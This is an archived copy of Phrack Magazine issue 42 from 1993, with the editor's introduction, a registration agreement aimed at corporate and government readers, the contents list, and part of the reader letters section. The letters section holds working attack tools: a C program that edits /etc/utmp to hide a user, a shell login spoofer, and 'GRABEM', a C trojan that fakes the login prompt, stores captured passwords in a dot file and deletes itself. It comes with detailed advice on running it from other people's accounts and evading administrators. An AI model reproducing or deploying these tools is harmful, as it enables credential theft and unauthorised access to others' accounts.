home *** CD-ROM | disk | FTP | other *** search
/ The World of Computer Software / World_Of_Computer_Software-02-387-Vol-3of3.iso / p / phrack42.zip / PHRACK42.TXT next >
Text File  |  1993-03-25  |  487KB  |  12,113 lines

  1.  
  2.  
  3. Date:     Tue Mar 23, 1993  5:55 am  PST
  4. From:     phrack
  5.           EMS: INTERNET / MCI ID: 376-5414
  6.           MBX: phrack@stormking.com
  7.  
  8. TO:       Mitchell K. Hobish / MCI ID: 116-6178
  9. TO:       Anthony Weiner / MCI ID: 300-6908
  10. TO:       Thomas J. Klotzbach / MCI ID: 375-1365
  11. TO:       Andrew Koran / MCI ID: 396-7939
  12. TO:       Pascal Lointier / MCI ID: 504-4319
  13. TO:       Peter Nesbitt / MCI ID: 511-1312
  14. TO:     * Berton Corson / MCI ID: 528-0397
  15. TO:       Jeff Ubois / MCI ID: 554-3399
  16. TO:       Michael McMahon / MCI ID: 585-7625
  17. TO:       Multiple recipients of list
  18.           EMS: INTERNET / MCI ID: 376-5414
  19.           MBX: phrack@stormking.com
  20. Subject:  Phrack 42/1-14
  21.  
  22.                               ==Phrack Magazine==
  23.  
  24.                    Volume Four, Issue Forty-Two, File 1 of 14
  25.  
  26.                                  Issue 42 Index
  27.                               ___________________
  28.  
  29.                                P H R A C K   4 2
  30.  
  31.                                  March 1, 1993
  32.                               ___________________
  33.  
  34.         ~ Happy Anniversary Bill Cook & Tim Foley, we love you both! ~
  35.  
  36.  
  37. Here it is.  Amidst all the fanfare and hoopla, Phrack 42 leaps from
  38. your electronic mail box to infect your very soul.   It was just a few
  39. short years ago on this day that one of the greatest abuses of
  40. governmental authority took place in the happy little town of Austin,
  41. Texas.  This issue marks the three year anniversary of these raids and a
  42. hearty hello goes out to Bellcore, The United States Secret Service, and
  43. the US District Attorney's Office.
  44.  
  45. As many of you have read previously, or otherwise heard through the
  46. electronic grapevines, Dispater is no longer editor of Phrack.  Your
  47. new editor, as I was most recently referred to so lovingly by
  48. my long-time friend John Lee on the alt.cyberpunk Usenet group:
  49. "the long hair and heavy metal beer drinking Texan that
  50. Bruce Sterling finds so .. ahem.. 'attractive'."  In case you don't get
  51. the joke, my name is Erikb, and I'm a hacker.
  52.  
  53. There are a few very distinct differences beginning with this issue of
  54. Phrack.  First and foremost, Phrack is now registered with the Library
  55. of Congress, and has its own ISSN.  Yes, boys and girls, you can
  56. go to Washington, D.C. and look it up.  This adds a new era of
  57. legitimacy to Phrack in that with such a registration, Phrack should
  58. never again face any legal challenge that would bypass any paper
  59. based magazine.
  60.  
  61. After much deliberation, I have concluded that Phrack
  62. will no longer provide the world's anti-hacker corporate and
  63. governmental types (IE: THE MAN) such valuable information for free.
  64. This will of course have absolutely no effect on YOU, the hackers of the
  65. world.  Phrack has always been, and will always continue to be yours to
  66. copy and distribute amongst yourselves without limitation, as long as
  67. the files retain unchanged and intact.
  68.  
  69. Entities who register their subscriptions to Phrack will be providing
  70. valuable demographic information to Phrack and its readers on exactly
  71. who outside our community actually takes an active interest in us.
  72. Yes, it will also generate some income.  The proceeds of all monies
  73. earned by Phrack will be used to actually compensate contributors for
  74. articles of interest, and most importantly, help a certain person
  75. pay off the debt incurred by the twist of fate dealt him through his
  76. involvement with this publication in the past.  I have no interest in
  77. making any money off of Phrack, as if I were to show a profit, I would
  78. have to contribute to Tim Foley's expense account via the IRS and I have
  79. absolutely no desire to fund his antics further than I am already
  80. forced to.
  81.  
  82. To keep things honest, any information about the financial affairs
  83. of Phrack will be made available to anyone who cares to write and
  84. ask.  Thus, we can all see if "THE MAN" is truly as ethical as he would
  85. have us believe, especially since our rate will be considerably
  86. less than many magazines (or military screwdrivers).
  87.  
  88. Now, pertaining to "THE MAN."  Phrack does not care for you and the way
  89. you secretly read and profit from Phrack and then use the information
  90. contained within its files to oppress its publishers, contributors and
  91. readers.  Henceforth, anyone involved with any ties to a computer
  92. profession for any corporation, the military or the federal government,
  93. any person with any ties for any telecommunications company, network
  94. service provider or interconnect carrier, any person with any ties to
  95. any law enforcement body, federal, state or otherwise, any elected
  96. officials, attorneys, accountants or computer consultants of any kind
  97. must register your subscription immediately.  If you are unsure of your
  98. status with this regard, please contact us.  We are going to be VERY
  99. liberal about "special dispensations" since it is not our intention to
  100. screw anyone out of a subscription.
  101.  
  102. -------------------------------------------------------------------------
  103.                        READ THE FOLLOWING
  104.  
  105.                IMPORTANT REGISTRATION INFORMATION
  106.  
  107. Corporate/Institutional/Government:  If you are a business,
  108. institution or government agency, or otherwise employed by,
  109. contracted to or providing any consultation relating to computers,
  110. telecommunications or security of any kind to such an entity, this
  111. information pertains to you.
  112.  
  113. You are instructed to read this agreement and comply with its
  114. terms and immediately destroy any copies of this publication
  115. existing in your possession (electronic or otherwise) until
  116. such a time as you have fulfilled your registration requirements.
  117. A form to request registration agreements is provided
  118. at the end of this file.
  119.  
  120. Individual User:  If you are an individual end user whose use
  121. is not on behalf of a business, organization or government
  122. agency, you may read and possess copies of Phrack Magazine
  123. free of charge.  You may also distribute this magazine freely
  124. to any other such hobbyist or computer service provided for
  125. similar hobbyists.  If you are unsure of your qualifications
  126. as an individual user, please contact us as we do not wish to
  127. withhold Phrack from anyone whose occupations are not in conflict
  128. with our readership.
  129.  
  130. _______________________________________________________________
  131.  
  132. Phrack Magazine corporate/institutional/government agreement
  133.  
  134.    Notice to users ("Company"):  READ THE FOLLOWING LEGAL
  135. AGREEMENT.  Company's use and/or possession of this Magazine is
  136. conditioned upon compliance by company with the terms of this
  137. agreement.  Any continued use or possession of this Magazine is
  138. conditioned upon payment by company of the negotiated fee
  139. specified in a letter of confirmation from Phrack Magazine.
  140.  
  141.    This magazine may not be distributed by Company to any
  142. outside corporation, organization or government agency.  This
  143. agreement authorizes Company to use and possess the number of copies
  144. described in the confirmation letter from Phrack Magazine and for which
  145. Company has paid Phrack Magazine the negotiated agreement fee.  If
  146. the confirmation letter from Phrack Magazine indicates that Company's
  147. agreement is "Corporate-Wide", this agreement will be deemed to cover
  148. copies duplicated and distributed by Company for use by any additional
  149. employees of Company during the Term, at no additional charge.  This
  150. agreement will remain in effect for one year from the date of the
  151. confirmation letter from Phrack Magazine authorizing such continued use
  152. or such other period as is stated in the confirmation letter (the "Term").
  153. If Company does not obtain a confirmation letter and pay the applicable
  154. agreement fee, Company is in violation of applicable US Copyright laws.
  155.  
  156.     This Magazine is protected by United States copyright laws and
  157. international treaty provisions.  Company acknowledges that no title to
  158. the intellectual property in the Magazine is transferred to Company.
  159. Company further acknowledges that full ownership rights to the Magazine
  160. will remain the exclusive property of Phrack Magazine and Company will
  161. not acquire any rights to the Magazine except as expressly set
  162. forth in this agreement.  Company agrees that any copies of the
  163. Magazine made by Company will contain the same proprietary
  164. notices which appear in this document.
  165.  
  166.     In the event of invalidity of any provision of this agreement,
  167. the parties agree that such invalidity shall not affect the validity
  168. of the remaining portions of this agreement.
  169.  
  170.     In no event shall Phrack Magazine be liable for consequential, incidental
  171. or indirect damages of any kind arising out of the delivery, performance or
  172. use of the information contained within the copy of this magazine, even
  173. if Phrack Magazine has been advised of the possibility of such damages.
  174. In no event will Phrack Magazine's liability for any claim, whether in
  175. contract, tort, or any other theory of liability, exceed the agreement fee
  176. paid by Company.
  177.  
  178.     This Agreement will be governed by the laws of the State of Texas
  179. as they are applied to agreements to be entered into and to be performed
  180. entirely within Texas.  The United Nations Convention on Contracts for
  181. the International Sale of Goods is specifically disclaimed.
  182.  
  183.     This Agreement together with any Phrack Magazine
  184. confirmation letter constitute the entire agreement between
  185. Company and Phrack Magazine which supersedes any prior agreement,
  186. including any prior agreement from Phrack Magazine, or understanding,
  187. whether written or oral, relating to the subject matter of this
  188. Agreement.  The terms and conditions of this Agreement shall
  189. apply to all orders submitted to Phrack Magazine and shall supersede any
  190. different or additional terms on purchase orders from Company.
  191.  
  192. _________________________________________________________________
  193.  
  194.             REGISTRATION INFORMATION REQUEST FORM
  195.  
  196.  
  197. We have approximately __________ users.
  198.  
  199. We desire Phrack Magazine distributed by (Choose one):
  200.  
  201. Electronic Mail: _________
  202. Hard Copy:       _________
  203. Diskette:        _________  (Include size & computer format)
  204.  
  205.  
  206. Name:_______________________________  Dept:____________________
  207.  
  208. Company:_______________________________________________________
  209.  
  210. Address:_______________________________________________________
  211.  
  212. _______________________________________________________________
  213.  
  214. City/State/Province:___________________________________________
  215.  
  216. Country/Postal Code:___________________________________________
  217.  
  218. Telephone:____________________   Fax:__________________________
  219.  
  220.  
  221. Send to:
  222.  
  223. Phrack Magazine
  224. 603 W. 13th #1A-278
  225. Austin, TX 78701
  226. -----------------------------------------------------------------------------
  227.  
  228.  
  229. As many of you can imagine, this will be very hard to enforce.
  230. This is not our main concern, as people who choose to ignore
  231. this stipulation are in direct violation of applicable US
  232. Copyright laws and therefore are just as unethical and guilty as
  233. they have always claimed we are.
  234.  
  235. It would be an ironic turn of events should the FBI actually have to
  236. conduct raids against companies like Bellcore for harboring illegal
  237. copies of Phrack Magazine.  If, in your travels, you happen to see
  238. such an occurrence, feel free to let us know. :)
  239.  
  240. Enjoy the magazine.  It is for and by the hacking community.  Period.
  241.  
  242.  
  243.       Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
  244.                 3L33t : K L & T K
  245.                  News : Datastream Cowboy
  246.           Photography : Restricted Data Transmissions & dFx
  247.             Publicity : (Please, God, no more press)
  248.     Prison Consultant : The English Prankster
  249.     Creative Stimulus : Sandoz, Buena Vista Studios, The Sundays
  250.                 Mooks : Dave & Bruce
  251.             Librarian : Minor Threat
  252.             Thanks To : Professor Falken, Vince Niel, Skylar
  253.                         Rack, NOD, G. Tenet, Frosty
  254.          No Thanks To : Scott Chasin (who didn't even care)
  255.  
  256.  
  257. Phrack Magazine V. 4, #42, March 1, 1993.     ISSN 1068-1035
  258. Contents Copyright (C) 1993 Phrack Magazine, all rights reserved.
  259. Nothing may be reproduced in whole or in part without written
  260. permission of the Editor-In-Chief.  Phrack Magazine is made available
  261. quarterly to the amateur computer hobbyist free of charge.  Any
  262. corporate, government, legal, or otherwise commercial usage or
  263. possession (electronic or otherwise) is strictly prohibited without
  264. prior registration, and is in violation of applicable US Copyright laws.
  265.  
  266.                     Phrack Magazine
  267.                     603 W. 13th #1A-278
  268.                    Austin, TX 78701
  269.  
  270.                     phrack@well.sf.ca.us
  271.  
  272. Submissions to the above email address may be encrypted
  273. with the following key : (Not that we use PGP or encourage its
  274. use or anything.  Heavens no.  That would be politically-incorrect.
  275. Maybe someone else is decrypting our mail for us on another machine
  276. that isn't used for Phrack publication.  Yeah, that's it.   :) )
  277.  
  278. -----BEGIN PGP PUBLIC KEY BLOCK-----
  279. Version: 2.1
  280.  
  281. mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
  282. ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
  283. a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
  284. tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
  285. =q2KB
  286. -----END PGP PUBLIC KEY BLOCK-----
  287.  
  288.  
  289.  
  290.   -= Phrack 42 =-
  291.  Table Of Contents
  292.  ~~~~~~~~~~~~~~~~~
  293.  1. Introduction by The Editor                                 14K
  294.  2. Phrack Loopback / Editorial Page / Line Noise              48K
  295.  3. Phrack Pro-Phile on Lord Digital                           22K
  296.  4. Packet Switched Network Security by Chris Goggans          22K
  297.  5  Tymnet Diagnostic Tools by Professor Falken                35K
  298.  6. A User's Guide to XRAY by NOD                              11K
  299.  7. Useful Commands for the TP3010 Debug Port by G. Tenet      28K
  300.  8. Sprintnet Directory Part I by Skylar                       49K
  301.  9. Sprintnet Directory Part II by Skylar                      45K
  302. 10. Sprintnet Directory Part III by Skylar                     46K
  303. 11. Guide to Encryption by The Racketeer [HFC]                 32K
  304. 12. The Freedom Of Information Act and You by Vince Niel       42K
  305. 13. HoHoCon from Various Sources                               51K
  306. 14. PWN by Datastream Cowboy                                   29K
  307.  
  308.                                                       Total:  474K
  309.  
  310.      Phrack 42 is dedicated to John Guinasso, director of global
  311.      network security, BT North America, without whose immortal comments,
  312.      many would have never been motivated to write.
  313.  
  314.      "If you mess with our network and we catch you -- which we always
  315.      do -- you will go down."  (John Guinasso, Information Week, July 13, 1992)
  316.  
  317.      "Hell, WE owned Tymnet before BT did!"
  318.      (Anonymous hacker-type, Random Telephone Call, 1993)
  319.  
  320. _______________________________________________________________________________
  321.  
  322.  
  323.  
  324.  
  325. Date:     Tue Mar 23, 1993 12:59 pm  PST
  326. From:     phrack
  327.           EMS: INTERNET / MCI ID: 376-5414
  328.           MBX: phrack@stormking.com
  329.  
  330. TO:       Mitchell K. Hobish / MCI ID: 116-6178
  331. TO:       Anthony Weiner / MCI ID: 300-6908
  332. TO:       Thomas J. Klotzbach / MCI ID: 375-1365
  333. TO:       Andrew Koran / MCI ID: 396-7939
  334. TO:       Pascal Lointier / MCI ID: 504-4319
  335. TO:     * Berton Corson / MCI ID: 528-0397
  336. TO:       Jeff Ubois / MCI ID: 554-3399
  337. TO:       Multiple recipients of list
  338.           EMS: INTERNET / MCI ID: 376-5414
  339.           MBX: phrack@stormking.com
  340. Subject:  Phrack 42/2-14
  341.  
  342.                           ==Phrack Magazine==
  343.  
  344.               Volume Four, Issue Forty-Two, File 2 of 14
  345.  
  346.                       [-=:< Phrack Loopback >:=-]
  347. ============================================================================
  348.       !!!!WATCH THIS SPACE FOR SUMMERCON INFORMATION NEXT ISSUE!!!!
  349. ============================================================================
  350.  
  351. I 'found' this little C program a few days ago, and runs on most UNIX
  352. machines I think (As I found it, I cant claim fame for writing it!).
  353.  
  354. What it does, is change your userid and x25 address to anything of your
  355. choice. This only affects programs such as 'write' and 'who'. It doesn't
  356. automatically give you different access rights, so it can only be used
  357. to disguise your real identity.
  358.  
  359. Usage
  360. -----
  361.  
  362.    inv god somewhere (Changes your uid to 'god' and X.25 to 'somewhere')
  363.    inv ''  ''        (Makes you INVISIBLE on 'who')
  364.  
  365. Program invis.c
  366. ---------------
  367.  
  368. #include <stdio.h>
  369. #include <utmp.h>
  370. #include <sys/types.h>
  371.  
  372. #include <lastlog.h>
  373.  
  374. main(argc,argv)
  375. int argc;
  376. char *argv[];
  377. {
  378.  FILE *f;
  379.  struct utmp u;
  380.  
  381.  int v=ttyslot(1);
  382.  if(v==-1)
  383.  {
  384.   fprintf(stderr,"Can't find terminal.\n");
  385.   exit(1);
  386.  
  387.  if(argc!=3)
  388.  {
  389.   fprintf(stderr,"Args!\n");
  390.   exit(1);
  391.  }
  392.  f=fopen("/etc/utmp","r+");
  393.  if(f==NULL)
  394.  {
  395.   fprintf(stderr,"Utmp has escaped!\n");
  396.   exit(1);
  397.  }
  398.  if(fseek(f,v*sizeof(u),0)==-1)
  399.  {
  400.   fprintf(stderr,"Garbage utmp\n");
  401.   exit(1);
  402.  }
  403.  if(fread((char *)&u,sizeof(u),1,f)!=1)
  404.  {
  405.   fprintf(stderr,"Write failed\n");
  406.   exit(1);
  407.  }
  408.  
  409.  strncpy(u.ut_name,argv[1],8);
  410.  strncpy(u.ut_host,argv[2],16);
  411.  if(fseek(f,v*sizeof(u),0)==-1)
  412.  {
  413.   fprintf(stderr,"Seek failed\n");
  414.   exit(1);
  415.  }
  416.  fwrite((char *)&u,sizeof(u),1,f);
  417.  fclose(f);
  418. }
  419.  
  420. I personaly have not used this program (to hack or for anything else)
  421. What you do with it is up to you....,
  422.                                                             ________
  423. Have fun...., !!!                                          (        )____
  424.                                                           (  Alas, life  )
  425.                                                         (   is but an   )
  426.                                                         (    Aardvaark.. )
  427.                                                          (       __      )
  428.                                                       .   (_____)  (____)
  429. * * * * * * * * * * * * * * * *                     . ? .       ()
  430. * CHEERS_ THEN - _     _      *                       __      ()
  431. *   ___/_/______|_|___| |__   *                     /    \  ()
  432. *  |________   _______| |__|  *                    |_    _|
  433. *    / /    | | | |   | |     *                   |(0)||(0)|
  434. *   / /___  | | | |   | |     *                  /|_  \/  _|\
  435. *  /___  /  | | | |   | |     *                  || | == | ||
  436. *     / /   | | \  \__/ /     *                  || \____/ ||
  437. *    / /    |_|   \____/      *                 ///\  !!  /\\\
  438. *-*-/_/-*-*-*-*-*-*-*-*-*-*-*-*-=-=-=-=-=-=-=-=-!!!-!-=-=-!-!!!-=-=-=-=-=-=-=-=
  439.  
  440. -------------------------------------------------------------------------------
  441.  
  442. I am interested in getting in contact with hackers in Nord Italy
  443. (I am located in Torino). Do you know anybody ?
  444.  
  445. Can you help TheNewHacker ??
  446.  
  447. Thanks
  448.  
  449. TheNewHacker
  450.  
  451. [Editor:  Actually, we are in the process of recruiting people to
  452.           write for a compilation file on the hacking scenes in countries
  453.           around the world.  One person is working on Italy.  Perhaps when
  454.           this file is completed, you will be able to network through that
  455.           information.
  456.           If anyone in a country other than America is interested in
  457.           contributing to this effort, please write us at:
  458.           phrack@well.sf.ca.us !  ]
  459.  
  460. -----------------------------------------------------------------------------
  461.  
  462.  
  463. hello, i must say i love your publication.  I have a little kind of
  464. hack/phreak for you guys.
  465.  
  466. When you approach a Red light, preferably at night with few cars around,
  467. continually flash your bright lights.  This tricks the light into believing
  468. this a cop waiting behind traffic at the light thus changing the light after
  469. about 10 flashes.  I discovered that after seeing several police officers turn
  470. on their lights before they hit lights and was amazed on how easily the light
  471. changed.  If you have say, a Mag-lite the trick works if you point directly
  472. at the top of the post-light and the ones hanging right above red on verticals
  473. and right above yellow on horizontals.
  474.  
  475. hope this helps etc.   (i fucking hate those damn red lights)
  476.  
  477. Dave.
  478.  
  479. [Editor:  I've actually tried this.  It works on most major
  480.           intersections]
  481.  
  482. -----------------------------------------------------------------------------
  483.  
  484. Hallo !
  485. I'd like to make just some addition to the APPENDIX A of the
  486. Racketeer's article "The POWER of Electronic Mail" - there are
  487. new guys in InterNET -> Russians (!). They have the awful
  488. connection, but it's cool team. So, add :
  489.  
  490.  .su           kremvax.hq.demos.su
  491.  
  492. And one more note, in the SMTP installed on the Sun Station I'm working
  493. on there isn't command TICK, but exist some strange like RSET and
  494. EXPN.
  495.       Spy
  496.  
  497.   P.S. Sorry for my bad English.
  498.  
  499. [Editor:  Russia has a lot of computers online these days.  Look for
  500.           more on the Russian Internet in upcoming Phracks!]
  501.  
  502. -----------------------------------------------------------------------------
  503.  
  504. There is another, much simpler way to expand your password collection,
  505. other than tty spoofing. Why not just run a program that simulates the
  506. login process, and then leave it running on the console for an unsuspecting
  507. victim? A simple example is below. Execute by typing getpass:logout.
  508.  
  509. --------File: getpass----------
  510. LOGIN=""
  511. PASSWD=""
  512. clear
  513. echo -n "login: "
  514. read LOGIN
  515. echo "$LOGIN" >name
  516. sleep 3
  517. echo -n "Password:"
  518. read PASSWD
  519. echo "$PASSWD" >password
  520. echo
  521. echo -n "Login incorrect"
  522. -------------------------------
  523.  
  524. The only problem I have is that I don't know how to make it so that
  525. the password, when entered, isn't shown on the screen. I'm sure you
  526. can come up with a solution.
  527.  
  528.  
  529. [Editor:  actually, someone kinda did.  See the next letter]
  530.  
  531. -----------------------------------------------------------------------------
  532.  
  533. A Better UNIX Password Grabber
  534. by The K-Man
  535.  
  536.  
  537. I blame it entirely on boredom.  Well, that and an acute case of end-
  538. of-semester neural gridlock.  I was sitting in the lab a couple of years
  539. ago, my head leaning against a Sparc-2 display, my index finger hitting the
  540. return key over and over again at the login prompt.  It was all my mind and
  541. body were capable of at the time.  Then a little thought formed in the back
  542. of my mind: "You know, it would be pretty damn easy to write a program to
  543. imitate the behavior of this screen while grabbing user id's and passwords."
  544. So I logged in and started coding.  Then I thought to myself, "You know, with
  545. a few extra lines of code and a couple of tricks, I could make this little
  546. guy almost completely undetectable and untraceable while running."  So I
  547. coded some more.  A couple of hours later, out popped the following
  548. program:
  549.  
  550. ---------------------------- Cut Here -----------------------------------
  551.  
  552. /*----------------------------------------------------------------------+
  553. | GRABEM 1.0            by The K-Man      |
  554. | A Cute little program to collect passwords on the Sun workstations.   |
  555. +----------------------------------------------------------------------*/
  556.  
  557. #define PASSWORD "Password:"
  558. #define INCORRECT "\nLogin incorrect"
  559. #define FILENAME ".exrc%"
  560.  
  561. #include <stdio.h>
  562. #include <signal.h>
  563.  
  564.  
  565. /*-----------------------------------------------------------------------+
  566. | ignoreSig                 |
  567. |                   |
  568. | Does nothing. Used to trap SIGINT, SIGTSTP, SIGQUIT.     |
  569. +-----------------------------------------------------------------------*/
  570. void ignoreSig ()
  571. {
  572.  return;
  573. }
  574.  
  575.  
  576. /*-----------------------------------------------------------------------+
  577. | Main                    |
  578. +-----------------------------------------------------------------------*/
  579. main()
  580. {
  581.  
  582. char  name[10],     /* users name             */
  583.   password[10];    /* users password         */
  584.  
  585.  
  586.  
  587. int  i,       /* loop counter               */
  588.   lab,      /* lab # you're running on    */
  589.   procid;      /* pid of the shell we're under  */
  590.  
  591. FILE  *fp;      /* output file          */
  592.  
  593.  
  594.  /*-------------------------------------------------------------------+
  595.  | Trap the SIGINT (ctrl-C), SIGSTP (ctrl-Z), and SIGQUIT (ctrl-\)    |
  596.  | signals so the program doesn't stop and dump back to the shell.    |
  597.  +-------------------------------------------------------------------*/
  598.  signal (SIGINT, ignoreSig);
  599.  signal (SIGTSTP, ignoreSig);
  600.  signal (SIGQUIT, ignoreSig);
  601.  
  602.  /*-------------------------------------------------------------------+
  603.  | Get the parent pid so that we can kill it quickly later.  Remove   |
  604.  | this program from the account.          |
  605.  +-------------------------------------------------------------------*/
  606.  procid = getppid();
  607.  system ("\\rm proj2");
  608.  
  609.  /*-------------------------------------------------------------------+
  610.  | Ask for the lab # we're running on.  Clear the screen.    |
  611.  +-------------------------------------------------------------------*/
  612.  printf ("lab#: ");
  613.  scanf ("%d", &lab);
  614.  for (i=1; i<40; i++)
  615.   printf ("\n");
  616.  getchar();
  617.  
  618.  /*-------------------------------------------------------------------+
  619.  | Outer for loop.  If the name is <= 4 characters, it's probably not |
  620.  | a real id.  They screwed up.  Give 'em another chance.             |
  621.  +-------------------------------------------------------------------*/
  622.  for(;;)
  623.  {
  624.   /*---------------------------------------------------------------+
  625.   | If they hit return, loop back and give 'em the login again.    |
  626.   +---------------------------------------------------------------*/
  627.   for (;;)
  628.   {
  629.    printf("lab%1d login: ",lab);
  630.    gets (name);
  631.  
  632.    if (strcmp (name, "") != 0)
  633.     break;
  634.   }
  635.  
  636.   /*---------------------------------------------------------------+
  637.   | Turn off the screen echo, ask for their password, and turn the |
  638.   | echo back on.              |
  639.   +---------------------------------------------------------------*/
  640.   system ("stty -echo > /dev/console");
  641.   printf(PASSWORD);
  642.   scanf("%s",password);
  643.   getchar();
  644.   system ("stty echo > /dev/console");
  645.  
  646.  
  647.   /*---------------------------------------------------------------+
  648.   | Write their userid and password to the file.                   |
  649.   +---------------------------------------------------------------*/
  650.   if ( ( fp = fopen(FILENAME,"a") )  != NULL )
  651.   {
  652.    fprintf(fp,"login %s has password %s\n",name,password);
  653.    fclose(fp);
  654.   }
  655.  
  656.   /*---------------------------------------------------------------+
  657.   | If the name is bogus, send 'em back through         |
  658.   +---------------------------------------------------------------*/
  659.   if (strlen (name) >= 4)
  660.    break;
  661.   else
  662.    printf (INCORRECT);
  663.  }
  664.  
  665.  /*-------------------------------------------------------------------+
  666.  | Everything went cool. Tell 'em they fucked up and mis-typed and    |
  667.  | dump them out to the REAL login prompt.  We do this by killing the |
  668.  | parent process (console).                                          |
  669.  +-------------------------------------------------------------------*/
  670.  printf (INCORRECT);
  671.  kill (procid, 9);
  672. }
  673.  
  674. ---------------------------- Cut Here -----------------------------------
  675.  
  676.  
  677. HOW IT WORKS
  678.  
  679. You can probably figure this out by reading the code, but I thought I'd
  680. just add some comments on why I did what I did.
  681.  
  682. The first thing is does is install the signal handler. All it does is trap
  683. SIGINT, SIGSTP, and SIGQUIT, so that the person trying to log into the machine
  684. this baby is running on can't kill it with a keystroke.  Next, it gets the
  685. parent process ID.  We'll use this later to kill it off quickly.  Then it
  686. proceeds to erase the executable file.  Sysadmins can't find a trojan horse
  687. program that isn't there.
  688.  
  689. >From here it goes on to imitate the login and password prompts.  You'll
  690. probably have to change the code to get it to imitate the login process on
  691. your particular machine.
  692.  
  693. When it gets a userid and password, it appends them to an existing file in
  694. the account.  I chose the .exrc, but any dot file will work.  The point being
  695. to use a file that already exists and should be in the account.  Don't leave
  696. any extra suspicious files lying around.
  697.  
  698. After it writes the uid and password to the file, it bumps the user back
  699. to the real login prompt by killing off the shell that was the parent process
  700. of the program.  The cut is almost instantaneous; the user would have to be
  701. inhumanly observant to notice the transition.
  702.  
  703.  
  704. HOW TO USE
  705.  
  706. Well, first you need an account to run it from.  If your site has guest 
  707. accounts,
  708. you've got it made.  If not, I'd suggest using a little social engineering to
  709. get one other person's account.  With that account and the program, you can grab
  710. access to many more.  I wouldn't recommend running it from an account that has
  711. your name on it.  That just makes it a little more dangerous than it needs to 
  712. be.
  713. Of course, if the sysadmin happens to catch the program running on your login,
  714. you can always claim to know nothing.  Say someone else must have gotten your
  715. password and is using your account to escape detection.  He might buy it.  But
  716. if you have the source for the program sitting somewhere in your account, and
  717. they find it, you're fucked.  So it's best to use someone else's account for
  718. the job.
  719.  
  720. After you've gotten the account you'll be running it from, you'll need to get
  721. the program in that account somehow.  I started off by keeping a copy of the
  722. source somewhere it my account, named with something innocuous and hidden
  723. among bunches of source files, but I got paranoid and started hauling the source
  724. around with me on a bar floppy.  Do whatever suits your level of paranoia.
  725.  
  726. Copy the source to the account you'll be running it from and compile it.
  727. Trash the source, and name the program something that won't stand out in a
  728. ps list.  selection_svc is a nice innocuous name, and it appears everywhere.
  729. Do a ps on one of your machines and look for processes that hang around for
  730. a long time.  You might want to hide it as a daemon.  Be creative.
  731.  
  732. Now run the program and sit back and wait.  Or leave and come back later.
  733. When you know that someone has tried to log on to your booby trapped machine,
  734. log back into the account you borrowed to run the program in and vi or emacs (if
  735. you're that kind of person) out the captured userid and password.  Simple as
  736. that.
  737.  
  738. Note that the two times that you stand the greatest chance of being caught
  739. are when you first compile and run the program and when you retrieve your
  740. captured uid and passwords.  There's the remote chance that someone might see
  741. you at work and see what you're doing, but it's not very likely.  If you start
  742. acting all paranoid you'll draw more attention to yourself than you would have
  743. gotten in the first place.  If your site has dialup lines, you might want to do
  744. a dialin to retrieve the passwords. Or you might prefer to do it in person.
  745. All depends on your paranoia quotient which you think is more secure, I guess.
  746.  
  747.  
  748. TIPS
  749.  
  750. Be careful which dot files you use.  I chose the .exrc because it was something
  751. that wasn't used often at our site.  If you chose the .cshrc or other frequently
  752. accessed file, put a # before the uid and password you write to that file.  That
  753. way,  when that dot file is sourced, it'll treat that line as a comment and not
  754. spit out an error message that could cause suspicion.
  755.  
  756. Try to run the program at a time when you know there will be heavy machine
  757. usage.  That way you'll trap something quick.  The longer your program
  758. runs, the greater the chance it will be found.
  759.  
  760. Don't be greedy.  Run on only one or two machines at a time.  And if you run
  761. on more than one machine, run out of a different account on each one.  Again,
  762. the more you put out there, the better the chance that at least one will be
  763. found.
  764.  
  765.  
  766. PARTING NOTE
  767.  
  768. The morning after I wrote this program was the first time I got to use it.  I
  769. set it running on a guest account, the went to a machine across the room to
  770. do some legitimate work.  One of my friends walks in shortly after that, and
  771. we start shooting the shit.  A minute or two later, the sysadmin walks in, sits
  772. down, and logs in to the machine I ran the program on.  I came really close to
  773. dropping my fudge right then and there.  The only thing running through my
  774. mind was "Either I'm totally fucked, or I have root."  Turned out it was choice
  775. B.  Too bad the guy changed his password once a week, and I wasn't smart enough
  776. to fix it so that I would see the change.  Oh well, I had fun for a week though.
  777. There were quite a few interesting e-mail messages sent back and forth that 
  778. week.
  779. I think the best one was the one from our (male) department head to one of our
  780. radical she-male hard-core no-damn-gifs feminist female professors, detailing
  781. all the perverted sexual acts that he would like to perform with and on her. :)
  782.  
  783. Anyway, have fun with the program.  Maybe I'll get a chance to come up with
  784. some more cool UNIX programs in the future.
  785.  
  786.  
  787.            Later,
  788.             K-Man
  789.  
  790. -----------------------------------------------------------------------------
  791.  
  792.         In a recent issue of PHRACK you had some article or loopback about
  793. getting information about people via modem.  I am somewhat interested in
  794. this and could use this information.  I have a friend who is a part-time
  795. bounty hunter and could use such information to track people down.
  796. Could you please send me some information about who to contact to find out
  797. this information.  What I could REALLY use is an on-line up-to-date
  798. phone/address book that I could call to find out anybody's address.  Is
  799. there such a thing?  If you have any information please e-mail me, since I
  800. am unable to get your mag on a regular basis.  Thanx a mil!
  801.  
  802.                                 Scarface
  803.  
  804. [Editor:  Actually there are quite a large number of databases that keep
  805.           information on everyone.  There is TRW, Equifax, TransUnion,
  806.           Information America and NAI just to name a few.  Many of these
  807.           services are very expensive, but even services like CompuServe
  808.           allow users to look up people all over America using
  809.           PhoneFile which compiles data from all kinds of public
  810.           records.  Nexis can allow you to look up real estate data on
  811.           just about anyone with loans on their houses.  Every public
  812.           utility and department of motor vehicles provides information
  813.           on their records, and many are online.
  814.  
  815.           A good book to read about this kind of thing is
  816.  
  817.           Privacy For Sale
  818.           Jeffrey Rothfeder
  819.  
  820.           Simon & Schuster
  821.           $22.00]
  822. -----------------------------------------------------------------------------
  823.                             THE GOLDEN ERA REBORN!
  824.  
  825.      Relive the thrill of the golden era of hacking through our exclusive
  826.         collection of BBS messages.  Our collection contains posts from
  827.           over 40 of the most popular hack/phreak BBSes of all time.
  828.        Experience the birth of the computer underground again from your
  829.        own computer with this collection of original posts from bulletin
  830.                                  boards like:
  831.  
  832.                                    * 8BBS *
  833.                                    * OSUNY *
  834.                                  * PLOVERNET *
  835.                             * THE LEGION OF DOOM *
